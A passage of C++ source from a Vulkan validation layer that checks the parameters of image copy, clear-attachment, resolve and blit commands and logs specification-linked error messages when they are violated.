            if (region.srcSubresource.aspectMask != region.dstSubresource.aspectMask) {
                char const str[] = "vkCmdCopyImage(): Src and dest aspectMasks for each region must match";
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                                HandleToUint64(command_buffer), "VUID-VkImageCopy-aspectMask-00137", "%s.", str);
            }
        }

        // For each region, the aspectMask member of srcSubresource must be present in the source image
        if (!VerifyAspectsPresent(region.srcSubresource.aspectMask, src_image_state->createInfo.format)) {
            std::stringstream ss;
            ss << "vkCmdCopyImage(): pRegion[" << i
               << "] srcSubresource.aspectMask cannot specify aspects not present in source image";
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                            HandleToUint64(command_buffer), "VUID-VkImageCopy-aspectMask-00142", "%s.", ss.str().c_str());
        }

        // For each region, the aspectMask member of dstSubresource must be present in the destination image
        if (!VerifyAspectsPresent(region.dstSubresource.aspectMask, dst_image_state->createInfo.format)) {
            std::stringstream ss;
            ss << "vkCmdCopyImage(): pRegion[" << i << "] dstSubresource.aspectMask cannot specify aspects not present in dest image";
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                            HandleToUint64(command_buffer), "VUID-VkImageCopy-aspectMask-00143", "%s.", ss.str().c_str());
        }

        // Check region extents for 1D-1D, 2D-2D, and 3D-3D copies
        if (src_image_state->createInfo.imageType == dst_image_state->createInfo.imageType) {
            // The source region specified by a given element of regions must be a region that is contained within srcImage
            VkExtent3D img_extent = GetImageSubresourceExtent(src_image_state, &(region.srcSubresource));
            if (0 != ExceedsBounds(&region.srcOffset, &src_copy_extent, &img_extent)) {
                std::stringstream ss;
                ss << "vkCmdCopyImage(): Source pRegion[" << i << "] with mipLevel [ " << region.srcSubresource.mipLevel
                   << " ], offset [ " << region.srcOffset.x << ", " << region.srcOffset.y << ", " << region.srcOffset.z
                   << " ], extent [ " << src_copy_extent.width << ", " << src_copy_extent.height << ", " << src_copy_extent.depth
                   << " ] exceeds the source image dimensions";
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                                HandleToUint64(command_buffer), "VUID-vkCmdCopyImage-pRegions-00122", "%s.", ss.str().c_str());
            }

            // The destination region specified by a given element of regions must be a region that is contained within dst_image
            img_extent = GetImageSubresourceExtent(dst_image_state, &(region.dstSubresource));
            if (0 != ExceedsBounds(&region.dstOffset, &dst_copy_extent, &img_extent)) {
                std::stringstream ss;
                ss << "vkCmdCopyImage(): Dest pRegion[" << i << "] with mipLevel [ " << region.dstSubresource.mipLevel
                   << " ], offset [ " << region.dstOffset.x << ", " << region.dstOffset.y << ", " << region.dstOffset.z
                   << " ], extent [ " << dst_copy_extent.width << ", " << dst_copy_extent.height << ", " << dst_copy_extent.depth
                   << " ] exceeds the destination image dimensions";
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                                HandleToUint64(command_buffer), "VUID-vkCmdCopyImage-pRegions-00123", "%s.", ss.str().c_str());
            }
        }

        // Each dimension offset + extent limits must fall within the image subresource extent
        VkExtent3D subresource_extent = GetImageSubresourceExtent(src_image_state, &(region.srcSubresource));
        if (slice_override) src_copy_extent.depth = depth_slices;
        uint32_t extent_check = ExceedsBounds(&(region.srcOffset), &src_copy_extent, &subresource_extent);
        if (extent_check & x_bit) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                            HandleToUint64(command_buffer), "VUID-VkImageCopy-srcOffset-00144",
                            "vkCmdCopyImage(): Source image pRegion %1d x-dimension offset [%1d] + extent [%1d] exceeds subResource "
                            "width [%1d].",
                            i, region.srcOffset.x, src_copy_extent.width, subresource_extent.width);
        }
        if (extent_check & y_bit) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                            HandleToUint64(command_buffer), "VUID-VkImageCopy-srcOffset-00145",
                            "vkCmdCopyImage(): Source image pRegion %1d y-dimension offset [%1d] + extent [%1d] exceeds subResource "
                            "height [%1d].",
                            i, region.srcOffset.y, src_copy_extent.height, subresource_extent.height);
        }
        if (extent_check & z_bit) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                            HandleToUint64(command_buffer), "VUID-VkImageCopy-srcOffset-00147",
                            "vkCmdCopyImage(): Source image pRegion %1d z-dimension offset [%1d] + extent [%1d] exceeds subResource "
                            "depth [%1d].",
                            i, region.srcOffset.z, src_copy_extent.depth, subresource_extent.depth);
        }

        // Adjust dest extent if necessary
        subresource_extent = GetImageSubresourceExtent(dst_image_state, &(region.dstSubresource));
        if (slice_override) dst_copy_extent.depth = depth_slices;

        extent_check = ExceedsBounds(&(region.dstOffset), &dst_copy_extent, &subresource_extent);
        if (extent_check & x_bit) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                            HandleToUint64(command_buffer), "VUID-VkImageCopy-dstOffset-00150",
                            "vkCmdCopyImage(): Dest image pRegion %1d x-dimension offset [%1d] + extent [%1d] exceeds subResource "
                            "width [%1d].",
                            i, region.dstOffset.x, dst_copy_extent.width, subresource_extent.width);
        }
        if (extent_check & y_bit) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                            HandleToUint64(command_buffer), "VUID-VkImageCopy-dstOffset-00151",
                            "vkCmdCopyImage(): Dest image pRegion %1d y-dimension offset [%1d] + extent [%1d] exceeds subResource "
                            "height [%1d].",
                            i, region.dstOffset.y, dst_copy_extent.height, subresource_extent.height);
        }
        if (extent_check & z_bit) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                            HandleToUint64(command_buffer), "VUID-VkImageCopy-dstOffset-00153",
                            "vkCmdCopyImage(): Dest image pRegion %1d z-dimension offset [%1d] + extent [%1d] exceeds subResource "
                            "depth [%1d].",
                            i, region.dstOffset.z, dst_copy_extent.depth, subresource_extent.depth);
        }

        // The union of all source regions, and the union of all destination regions, specified by the elements of regions,
        // must not overlap in memory
        // NOTE(review): the loop below includes j == i; presumably RegionIntersects compares src vs dst
        // subresources so a self-check is meaningful — confirm before skipping j == i.
        if (src_image_state->image == dst_image_state->image) {
            for (uint32_t j = 0; j < regionCount; j++) {
                if (RegionIntersects(&region, &pRegions[j], src_image_state->createInfo.imageType,
                                     FormatIsMultiplane(src_image_state->createInfo.format))) {
                    std::stringstream ss;
                    ss << "vkCmdCopyImage(): pRegions[" << i << "] src overlaps with pRegions[" << j << "].";
                    skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                                    HandleToUint64(command_buffer), "VUID-vkCmdCopyImage-pRegions-00124", "%s.", ss.str().c_str());
                }
            }
        }
    }

    // The formats of src_image and dst_image must be compatible. Formats are considered compatible if their texel size in bytes
    // is the same between both formats. For example, VK_FORMAT_R8G8B8A8_UNORM is compatible with VK_FORMAT_R32_UINT because
    // both texels are 4 bytes in size. Depth/stencil formats must match exactly.
    if (FormatIsDepthOrStencil(src_image_state->createInfo.format) || FormatIsDepthOrStencil(dst_image_state->createInfo.format)) {
        if (src_image_state->createInfo.format != dst_image_state->createInfo.format) {
            char const str[] = "vkCmdCopyImage called with unmatched source and dest image depth/stencil formats.";
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                            HandleToUint64(command_buffer), kVUID_Core_DrawState_MismatchedImageFormat, str);
        }
    } else {
        if (!FormatSizesAreEqual(src_image_state->createInfo.format, dst_image_state->createInfo.format, regionCount, pRegions)) {
            char const str[] = "vkCmdCopyImage called with unmatched source and dest image format sizes.";
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                            HandleToUint64(command_buffer), "VUID-vkCmdCopyImage-srcImage-00135", "%s.", str);
        }
    }

    // Source and dest image sample counts must match
    if (src_image_state->createInfo.samples != dst_image_state->createInfo.samples) {
        char const str[] = "vkCmdCopyImage() called on image pair with non-identical sample counts.";
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                        HandleToUint64(command_buffer), "VUID-vkCmdCopyImage-srcImage-00136", "%s", str);
    }

    skip |= ValidateMemoryIsBoundToImage(src_image_state, "vkCmdCopyImage()", "VUID-vkCmdCopyImage-srcImage-00127");
    skip |= ValidateMemoryIsBoundToImage(dst_image_state, "vkCmdCopyImage()", "VUID-vkCmdCopyImage-dstImage-00132");
    // Validate that SRC & DST images have correct usage flags set
    skip |= ValidateImageUsageFlags(src_image_state, VK_IMAGE_USAGE_TRANSFER_SRC_BIT, true, "VUID-vkCmdCopyImage-srcImage-00126",
                                    "vkCmdCopyImage()", "VK_IMAGE_USAGE_TRANSFER_SRC_BIT");
    skip |= ValidateImageUsageFlags(dst_image_state, VK_IMAGE_USAGE_TRANSFER_DST_BIT, true, "VUID-vkCmdCopyImage-dstImage-00131",
                                    "vkCmdCopyImage()", "VK_IMAGE_USAGE_TRANSFER_DST_BIT");
    if (GetApiVersion() >= VK_API_VERSION_1_1 || GetDeviceExtensions()->vk_khr_maintenance1) {
        skip |= ValidateImageFormatFeatureFlags(src_image_state, VK_FORMAT_FEATURE_TRANSFER_SRC_BIT, "vkCmdCopyImage()",
                                                "VUID-vkCmdCopyImage-srcImage-01995", "VUID-vkCmdCopyImage-srcImage-01995");
        skip |= ValidateImageFormatFeatureFlags(dst_image_state, VK_FORMAT_FEATURE_TRANSFER_DST_BIT, "vkCmdCopyImage()",
                                                "VUID-vkCmdCopyImage-dstImage-01996", "VUID-vkCmdCopyImage-dstImage-01996");
    }
    skip |= ValidateCmdQueueFlags(cb_node, "vkCmdCopyImage()", VK_QUEUE_TRANSFER_BIT | VK_QUEUE_GRAPHICS_BIT | VK_QUEUE_COMPUTE_BIT,
                                  "VUID-vkCmdCopyImage-commandBuffer-cmdpool");
    skip |= ValidateCmd(cb_node, CMD_COPYIMAGE, "vkCmdCopyImage()");
    skip |= InsideRenderPass(cb_node, "vkCmdCopyImage()", "VUID-vkCmdCopyImage-renderpass");
    bool hit_error = false;
    // Shared-presentable images allow additional valid layouts, so they get their own VUIDs
    const char *invalid_src_layout_vuid =
        (src_image_state->shared_presentable && GetDeviceExtensions()->vk_khr_shared_presentable_image) ?
"VUID-vkCmdCopyImage-srcImageLayout-01917" : "VUID-vkCmdCopyImage-srcImageLayout-00129"; const char *invalid_dst_layout_vuid = (dst_image_state->shared_presentable && GetDeviceExtensions()->vk_khr_shared_presentable_image) ? "VUID-vkCmdCopyImage-dstImageLayout-01395" : "VUID-vkCmdCopyImage-dstImageLayout-00134"; for (uint32_t i = 0; i < regionCount; ++i) { skip |= VerifyImageLayout(cb_node, src_image_state, pRegions[i].srcSubresource, srcImageLayout, VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL, "vkCmdCopyImage()", invalid_src_layout_vuid, "VUID-vkCmdCopyImage-srcImageLayout-00128", &hit_error); skip |= VerifyImageLayout(cb_node, dst_image_state, pRegions[i].dstSubresource, dstImageLayout, VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL, "vkCmdCopyImage()", invalid_dst_layout_vuid, "VUID-vkCmdCopyImage-dstImageLayout-00133", &hit_error); skip |= ValidateCopyImageTransferGranularityRequirements(cb_node, src_image_state, dst_image_state, &pRegions[i], i, "vkCmdCopyImage()"); } return skip; } void CoreChecks::PreCallRecordCmdCopyImage(VkCommandBuffer commandBuffer, VkImage srcImage, VkImageLayout srcImageLayout, VkImage dstImage, VkImageLayout dstImageLayout, uint32_t regionCount, const VkImageCopy *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_image_state = GetImageState(srcImage); auto dst_image_state = GetImageState(dstImage); // Make sure that all image slices are updated to correct layout for (uint32_t i = 0; i < regionCount; ++i) { SetImageLayout(cb_node, src_image_state, pRegions[i].srcSubresource, srcImageLayout); SetImageLayout(cb_node, dst_image_state, pRegions[i].dstSubresource, dstImageLayout); } // Update bindings between images and cmd buffer AddCommandBufferBindingImage(cb_node, src_image_state); AddCommandBufferBindingImage(cb_node, dst_image_state); } // Returns true if sub_rect is entirely contained within rect static inline bool ContainsRect(VkRect2D rect, VkRect2D sub_rect) { if ((sub_rect.offset.x < rect.offset.x) || (sub_rect.offset.x + 
sub_rect.extent.width > rect.offset.x + rect.extent.width) || (sub_rect.offset.y < rect.offset.y) || (sub_rect.offset.y + sub_rect.extent.height > rect.offset.y + rect.extent.height)) return false; return true; } bool CoreChecks::ValidateClearAttachmentExtent(VkCommandBuffer command_buffer, uint32_t attachment_index, FRAMEBUFFER_STATE *framebuffer, uint32_t fb_attachment, const VkRect2D &render_area, uint32_t rect_count, const VkClearRect *clear_rects) { bool skip = false; const IMAGE_VIEW_STATE *image_view_state = nullptr; if (framebuffer && (fb_attachment != VK_ATTACHMENT_UNUSED) && (fb_attachment < framebuffer->createInfo.attachmentCount)) { image_view_state = GetImageViewState(framebuffer->createInfo.pAttachments[fb_attachment]); } for (uint32_t j = 0; j < rect_count; j++) { if (!ContainsRect(render_area, clear_rects[j].rect)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-vkCmdClearAttachments-pRects-00016", "vkCmdClearAttachments(): The area defined by pRects[%d] is not contained in the area of " "the current render pass instance.", j); } if (image_view_state) { // The layers specified by a given element of pRects must be contained within every attachment that // pAttachments refers to const auto attachment_layer_count = image_view_state->create_info.subresourceRange.layerCount; if ((clear_rects[j].baseArrayLayer >= attachment_layer_count) || (clear_rects[j].baseArrayLayer + clear_rects[j].layerCount > attachment_layer_count)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-vkCmdClearAttachments-pRects-00017", "vkCmdClearAttachments(): The layers defined in pRects[%d] are not contained in the layers " "of pAttachment[%d].", j, attachment_index); } } } return skip; } bool CoreChecks::PreCallValidateCmdClearAttachments(VkCommandBuffer commandBuffer, uint32_t 
attachmentCount, const VkClearAttachment *pAttachments, uint32_t rectCount, const VkClearRect *pRects) { GLOBAL_CB_NODE *cb_node = GetCBNode(commandBuffer); bool skip = false; if (cb_node) { skip |= ValidateCmdQueueFlags(cb_node, "vkCmdClearAttachments()", VK_QUEUE_GRAPHICS_BIT, "VUID-vkCmdClearAttachments-commandBuffer-cmdpool"); skip |= ValidateCmd(cb_node, CMD_CLEARATTACHMENTS, "vkCmdClearAttachments()"); // Warn if this is issued prior to Draw Cmd and clearing the entire attachment if (!cb_node->hasDrawCmd && (cb_node->activeRenderPassBeginInfo.renderArea.extent.width == pRects[0].rect.extent.width) && (cb_node->activeRenderPassBeginInfo.renderArea.extent.height == pRects[0].rect.extent.height)) { // There are times where app needs to use ClearAttachments (generally when reusing a buffer inside of a render pass) // This warning should be made more specific. It'd be best to avoid triggering this test if it's a use that must call // CmdClearAttachments. skip |= log_msg(report_data, VK_DEBUG_REPORT_PERFORMANCE_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), kVUID_Core_DrawState_ClearCmdBeforeDraw, "vkCmdClearAttachments() issued on command buffer object %s prior to any Draw Cmds. 
It is recommended you " "use RenderPass LOAD_OP_CLEAR on Attachments prior to any Draw.", report_data->FormatHandle(commandBuffer).c_str()); } skip |= OutsideRenderPass(cb_node, "vkCmdClearAttachments()", "VUID-vkCmdClearAttachments-renderpass"); } // Validate that attachment is in reference list of active subpass if (cb_node->activeRenderPass) { const VkRenderPassCreateInfo2KHR *renderpass_create_info = cb_node->activeRenderPass->createInfo.ptr(); const uint32_t renderpass_attachment_count = renderpass_create_info->attachmentCount; const VkSubpassDescription2KHR *subpass_desc = &renderpass_create_info->pSubpasses[cb_node->activeSubpass]; auto framebuffer = GetFramebufferState(cb_node->activeFramebuffer); const auto &render_area = cb_node->activeRenderPassBeginInfo.renderArea; std::shared_ptr<std::vector<VkClearRect>> clear_rect_copy; for (uint32_t attachment_index = 0; attachment_index < attachmentCount; attachment_index++) { auto clear_desc = &pAttachments[attachment_index]; uint32_t fb_attachment = VK_ATTACHMENT_UNUSED; if (0 == clear_desc->aspectMask) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), "VUID-VkClearAttachment-aspectMask-requiredbitmask", " "); } else if (clear_desc->aspectMask & VK_IMAGE_ASPECT_METADATA_BIT) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), "VUID-VkClearAttachment-aspectMask-00020", " "); } else if (clear_desc->aspectMask & VK_IMAGE_ASPECT_COLOR_BIT) { uint32_t color_attachment = VK_ATTACHMENT_UNUSED; if (clear_desc->colorAttachment < subpass_desc->colorAttachmentCount) { color_attachment = subpass_desc->pColorAttachments[clear_desc->colorAttachment].attachment; if ((color_attachment != VK_ATTACHMENT_UNUSED) && (color_attachment >= renderpass_attachment_count)) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, 
VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), "VUID-vkCmdClearAttachments-aspectMask-02501", "vkCmdClearAttachments() pAttachments[%u].colorAttachment=%u is not VK_ATTACHMENT_UNUSED " "and not a valid attachment for render pass %s attachmentCount=%u. Subpass %u pColorAttachment[%u]=%u.", attachment_index, clear_desc->colorAttachment, report_data->FormatHandle(cb_node->activeRenderPass->renderPass).c_str(), cb_node->activeSubpass, clear_desc->colorAttachment, color_attachment, renderpass_attachment_count); color_attachment = VK_ATTACHMENT_UNUSED; // Defensive, prevent lookup past end of renderpass attachment } } else { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), "VUID-vkCmdClearAttachments-aspectMask-02501", "vkCmdClearAttachments() pAttachments[%u].colorAttachment=%u out of range for render pass %s" " subpass %u. colorAttachmentCount=%u", attachment_index, clear_desc->colorAttachment, report_data->FormatHandle(cb_node->activeRenderPass->renderPass).c_str(), cb_node->activeSubpass, subpass_desc->colorAttachmentCount); } fb_attachment = color_attachment; if ((clear_desc->aspectMask & VK_IMAGE_ASPECT_DEPTH_BIT) || (clear_desc->aspectMask & VK_IMAGE_ASPECT_STENCIL_BIT)) { char const str[] = "vkCmdClearAttachments() aspectMask [%d] must set only VK_IMAGE_ASPECT_COLOR_BIT of a color attachment."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), "VUID-VkClearAttachment-aspectMask-00019", str, attachment_index); } } else { // Must be depth and/or stencil if (((clear_desc->aspectMask & VK_IMAGE_ASPECT_DEPTH_BIT) != VK_IMAGE_ASPECT_DEPTH_BIT) && ((clear_desc->aspectMask & VK_IMAGE_ASPECT_STENCIL_BIT) != VK_IMAGE_ASPECT_STENCIL_BIT)) { char const str[] = "vkCmdClearAttachments() aspectMask [%d] is not a valid combination of bits."; skip |= log_msg(report_data, 
VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), "VUID-VkClearAttachment-aspectMask-parameter", str, attachment_index); } if (!subpass_desc->pDepthStencilAttachment || (subpass_desc->pDepthStencilAttachment->attachment == VK_ATTACHMENT_UNUSED)) { skip |= log_msg( report_data, VK_DEBUG_REPORT_PERFORMANCE_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), kVUID_Core_DrawState_MissingAttachmentReference, "vkCmdClearAttachments() depth/stencil clear with no depth/stencil attachment in subpass; ignored"); } else { fb_attachment = subpass_desc->pDepthStencilAttachment->attachment; } } if (cb_node->createInfo.level == VK_COMMAND_BUFFER_LEVEL_PRIMARY) { skip |= ValidateClearAttachmentExtent(commandBuffer, attachment_index, framebuffer, fb_attachment, render_area, rectCount, pRects); } else { // if a secondary level command buffer inherits the framebuffer from the primary command buffer // (see VkCommandBufferInheritanceInfo), this validation must be deferred until queue submit time if (!clear_rect_copy) { // We need a copy of the clear rectangles that will persist until the last lambda executes // but we want to create it as lazily as possible clear_rect_copy.reset(new std::vector<VkClearRect>(pRects, pRects + rectCount)); } auto val_fn = [this, commandBuffer, attachment_index, fb_attachment, rectCount, clear_rect_copy]( GLOBAL_CB_NODE *prim_cb, VkFramebuffer fb) { assert(rectCount == clear_rect_copy->size()); FRAMEBUFFER_STATE *framebuffer = GetFramebufferState(fb); const auto &render_area = prim_cb->activeRenderPassBeginInfo.renderArea; bool skip = false; skip = ValidateClearAttachmentExtent(commandBuffer, attachment_index, framebuffer, fb_attachment, render_area, rectCount, clear_rect_copy->data()); return skip; }; cb_node->cmd_execute_commands_functions.emplace_back(val_fn); } } } return skip; } bool CoreChecks::PreCallValidateCmdResolveImage(VkCommandBuffer 
commandBuffer, VkImage srcImage, VkImageLayout srcImageLayout, VkImage dstImage, VkImageLayout dstImageLayout, uint32_t regionCount, const VkImageResolve *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_image_state = GetImageState(srcImage); auto dst_image_state = GetImageState(dstImage); bool skip = false; if (cb_node && src_image_state && dst_image_state) { skip |= ValidateMemoryIsBoundToImage(src_image_state, "vkCmdResolveImage()", "VUID-vkCmdResolveImage-srcImage-00256"); skip |= ValidateMemoryIsBoundToImage(dst_image_state, "vkCmdResolveImage()", "VUID-vkCmdResolveImage-dstImage-00258"); skip |= ValidateCmdQueueFlags(cb_node, "vkCmdResolveImage()", VK_QUEUE_GRAPHICS_BIT, "VUID-vkCmdResolveImage-commandBuffer-cmdpool"); skip |= ValidateCmd(cb_node, CMD_RESOLVEIMAGE, "vkCmdResolveImage()"); skip |= InsideRenderPass(cb_node, "vkCmdResolveImage()", "VUID-vkCmdResolveImage-renderpass"); skip |= ValidateImageFormatFeatureFlags(dst_image_state, VK_FORMAT_FEATURE_COLOR_ATTACHMENT_BIT, "vkCmdResolveImage()", "VUID-vkCmdResolveImage-dstImage-02003", "VUID-vkCmdResolveImage-dstImage-02003"); bool hit_error = false; const char *invalid_src_layout_vuid = (src_image_state->shared_presentable && GetDeviceExtensions()->vk_khr_shared_presentable_image) ? "VUID-vkCmdResolveImage-srcImageLayout-01400" : "VUID-vkCmdResolveImage-srcImageLayout-00261"; const char *invalid_dst_layout_vuid = (dst_image_state->shared_presentable && GetDeviceExtensions()->vk_khr_shared_presentable_image) ? 
"VUID-vkCmdResolveImage-dstImageLayout-01401" : "VUID-vkCmdResolveImage-dstImageLayout-00263"; // For each region, the number of layers in the image subresource should not be zero // For each region, src and dest image aspect must be color only for (uint32_t i = 0; i < regionCount; i++) { skip |= ValidateImageSubresourceLayers(cb_node, &pRegions[i].srcSubresource, "vkCmdResolveImage()", "srcSubresource", i); skip |= ValidateImageSubresourceLayers(cb_node, &pRegions[i].dstSubresource, "vkCmdResolveImage()", "dstSubresource", i); skip |= VerifyImageLayout(cb_node, src_image_state, pRegions[i].srcSubresource, srcImageLayout, VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL, "vkCmdResolveImage()", invalid_src_layout_vuid, "VUID-vkCmdResolveImage-srcImageLayout-00260", &hit_error); skip |= VerifyImageLayout(cb_node, dst_image_state, pRegions[i].dstSubresource, dstImageLayout, VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL, "vkCmdResolveImage()", invalid_dst_layout_vuid, "VUID-vkCmdResolveImage-dstImageLayout-00262", &hit_error); skip |= ValidateImageMipLevel(cb_node, src_image_state, pRegions[i].srcSubresource.mipLevel, i, "vkCmdResolveImage()", "srcSubresource", "VUID-vkCmdResolveImage-srcSubresource-01709"); skip |= ValidateImageMipLevel(cb_node, dst_image_state, pRegions[i].dstSubresource.mipLevel, i, "vkCmdResolveImage()", "dstSubresource", "VUID-vkCmdResolveImage-dstSubresource-01710"); skip |= ValidateImageArrayLayerRange(cb_node, src_image_state, pRegions[i].srcSubresource.baseArrayLayer, pRegions[i].srcSubresource.layerCount, i, "vkCmdResolveImage()", "srcSubresource", "VUID-vkCmdResolveImage-srcSubresource-01711"); skip |= ValidateImageArrayLayerRange(cb_node, dst_image_state, pRegions[i].dstSubresource.baseArrayLayer, pRegions[i].dstSubresource.layerCount, i, "vkCmdResolveImage()", "srcSubresource", "VUID-vkCmdResolveImage-dstSubresource-01712"); // layer counts must match if (pRegions[i].srcSubresource.layerCount != pRegions[i].dstSubresource.layerCount) { skip |= log_msg( 
report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageResolve-layerCount-00267", "vkCmdResolveImage(): layerCount in source and destination subresource of pRegions[%d] does not match.", i); } // For each region, src and dest image aspect must be color only if ((pRegions[i].srcSubresource.aspectMask != VK_IMAGE_ASPECT_COLOR_BIT) || (pRegions[i].dstSubresource.aspectMask != VK_IMAGE_ASPECT_COLOR_BIT)) { char const str[] = "vkCmdResolveImage(): src and dest aspectMasks for each region must specify only VK_IMAGE_ASPECT_COLOR_BIT"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageResolve-aspectMask-00266", "%s.", str); } } if (src_image_state->createInfo.format != dst_image_state->createInfo.format) { char const str[] = "vkCmdResolveImage called with unmatched source and dest formats."; skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), kVUID_Core_DrawState_MismatchedImageFormat, str); } if (src_image_state->createInfo.imageType != dst_image_state->createInfo.imageType) { char const str[] = "vkCmdResolveImage called with unmatched source and dest image types."; skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), kVUID_Core_DrawState_MismatchedImageType, str); } if (src_image_state->createInfo.samples == VK_SAMPLE_COUNT_1_BIT) { char const str[] = "vkCmdResolveImage called with source sample count less than 2."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdResolveImage-srcImage-00257", "%s.", str); } if (dst_image_state->createInfo.samples != VK_SAMPLE_COUNT_1_BIT) { 
char const str[] = "vkCmdResolveImage called with dest sample count greater than 1."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdResolveImage-dstImage-00259", "%s.", str); } } else { assert(0); } return skip; } void CoreChecks::PreCallRecordCmdResolveImage(VkCommandBuffer commandBuffer, VkImage srcImage, VkImageLayout srcImageLayout, VkImage dstImage, VkImageLayout dstImageLayout, uint32_t regionCount, const VkImageResolve *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_image_state = GetImageState(srcImage); auto dst_image_state = GetImageState(dstImage); // Update bindings between images and cmd buffer AddCommandBufferBindingImage(cb_node, src_image_state); AddCommandBufferBindingImage(cb_node, dst_image_state); } bool CoreChecks::PreCallValidateCmdBlitImage(VkCommandBuffer commandBuffer, VkImage srcImage, VkImageLayout srcImageLayout, VkImage dstImage, VkImageLayout dstImageLayout, uint32_t regionCount, const VkImageBlit *pRegions, VkFilter filter) { auto cb_node = GetCBNode(commandBuffer); auto src_image_state = GetImageState(srcImage); auto dst_image_state = GetImageState(dstImage); bool skip = false; if (cb_node) { skip |= ValidateCmd(cb_node, CMD_BLITIMAGE, "vkCmdBlitImage()"); } if (cb_node && src_image_state && dst_image_state) { skip |= 